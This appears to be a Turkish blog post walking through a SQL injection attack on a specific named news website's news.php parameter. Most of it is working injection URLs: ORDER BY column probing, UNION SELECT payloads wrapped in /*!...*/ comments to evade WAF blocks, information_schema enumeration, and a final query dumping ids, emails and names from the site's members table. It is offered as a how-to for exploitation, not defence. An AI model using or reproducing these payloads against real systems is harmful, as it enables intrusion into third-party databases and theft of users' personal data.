Kapat

Sql İnjection Zaafiyeti

sql injection zaafiyetinin sömürülmesi

406 NOT ACCETABLE SQL INJECTION

http://www.zamaninternational.org/news.php?n=72 order by 100 http://www.zamaninternational.org/news.php?n=72′ order by 100–+ http://www.zamaninternational.org/news.php?n=72′ order by 100– http://www.zamaninternational.org/news.php?n=72 order by 100– http://www.zamaninternational.org/news.php?n=–72 order by 100– http://www.zamaninternational.org/news.php?n=-72 order by 100– – http://www.zamaninternational.org/news.php?n=–72′ order by 100–

bilindik order by methodları bunlar en çok yaygın olan en üstteki ikisi diğerleri de oldukça önemli. bize uygun olan

http://www.zamaninternational.org/news.php?n=72’ order by 100–+

Kolon sayısını bulmak için hata almayana kadar sayımızı azaltacağız.

order by 100–+ order by 50–+ order by 30–+

Şeklinde… Kolon sayımızı tespit ettik : 14

Kolon Sayımızı Bulduk 2. Aşamaya Geçelim. Union select yöntemler

http://www.zamaninternational.org/news.php?n=72 union select 1,2,3,….,14

* 14’e kadar yazıyoruz.

http://www.zamaninternational.org/news.php?n=72 UNION ALL SELECT 1,2,3,….,14

Bazı union selecet methodları

site.com/index.php?id=725+UNION+SELECT+1,2,3,4– (403 Forbidden) site.com/index.php?id=-725+UNION+SELECT+1,2,3,4– (403 Forbidden) site.com/index.php?id=-725+/*!UNION*/+/*!SELECT*/+1,2,3,4– (hatasız olanlarda)

*Şimdi Biz Kolon sayımızı bulduk o zaman devam etme şeklimiz böyle olacak.

http://www.zamaninternational.org/news.php?n=72′ /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14–+

ekrana çıkan 5 ile 7 herhangi birini seçebiliriz. bu sayılardan birinin yerine “group_concat(/*!table_name*/)” koyacağız.


http://www.zamaninternational.org/news.php?n=72′ /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,group_concat(/*!table_name*/),8,9,10,11,12,13,14–+

Bu şekilde yazdıktan sonra –+ ‘dan önce gelen kısma “from information_schema./!tables/ where /!table_schema/=database()” ekliyoruz yani son hali

http://www.zamaninternational.org/news.php?n=72′ /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,group_concat(/*!table_name*/),8,9,10,11,12,13,14 from information_schema./*!tables*/ where /*!table_schema*/=database()–+

şeklinde.. Şimdi Gelelim Dump Kısmına members’i dumplayacağımız için daha düzgün çıkması için hex ‘e çevireli başına 0x ekleyelim. members: 0X6D656D62657273 Şimdi table adlarını çektik sırada çekeceğimiz kolonlar olacağı için table yazan yerleri kolon ile değiştireceğiz.

http://www.zamaninternational.org/news.php?n=72′ /*!UNION*/ /*!SELECT*/ 1,2,3,4,group_concat(/*!column_name*/),6,7,8,9,10,11,12,13,14 from information_schema./*!columns*/ where /*!table_name*/=0x6D656D62657273– +

http://www.zamaninternational.org/news.php?n=30’/*!UNION*//*!SELECT*/ 1,2,3,4,group_concat(id,0x3a,email,0x3a,name),6,7,8,9,10,11,12,13,14 from members–+

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

error: